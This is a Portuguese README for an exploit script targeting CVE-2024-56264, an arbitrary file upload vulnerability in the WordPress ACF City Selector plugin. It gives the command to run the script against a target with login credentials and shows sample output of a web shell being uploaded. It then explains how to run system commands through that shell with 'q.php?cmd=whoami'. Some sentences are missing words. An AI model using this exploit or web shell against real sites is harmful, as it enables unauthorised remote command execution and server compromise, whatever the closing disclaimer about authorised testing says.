
Plugin ACF City Selector do WordPress <= 1.14.0 - Vulnerabilidade de upload arbitrário de arquivos
Este repositório contém um exploit para CVE-2024-56264, que é uma vulnerabilidade de Upload Arbitrário de Arquivo encontrada no plugin ACF City Selector do WordPress (versões <= 1.14.0). Esta vulnerabilidade permite que um atacante faça upload de um arquivo PHP malicioso (web shell) para uma instância vulnerável do WordPress e execute comandos arbitrários no servidor.
<= 1.14.0O plugin ACF City Selector não valida adequadamente os arquivos enviados, permitindo que atacantes e façam upload de . Uma vez que um arquivo PHP malicioso é enviado, um atacante pode executar comandos do sistema remotamente, levando ao .
Certifique-se de que os seguintes itens estão instalados antes de executar o script:
requests (Instale usando: pip install requests)Você pode instalar todas as dependências necessárias usando:
pip install -r requirements.txt
Executando o exploit:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help exibe esta mensagem de ajuda e sai
--url URL URL base do site (ex.: http://192.168.100.74/wordpress)
--username USERNAME nome de usuário do WordPress
--password PASSWORD senha do WordPress
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
Após a exploração bem-sucedida, você deve ver:
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
Se bem-sucedido, acesse o shell enviado via:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
Isso permite a execução remota de comandos no servidor.
Este script é destinado apenas para fins educacionais e de teste de segurança autorizados. O uso não autorizado é ilegal e pode resultar em consequências graves. O autor não se responsabiliza por qualquer uso indevido deste exploit.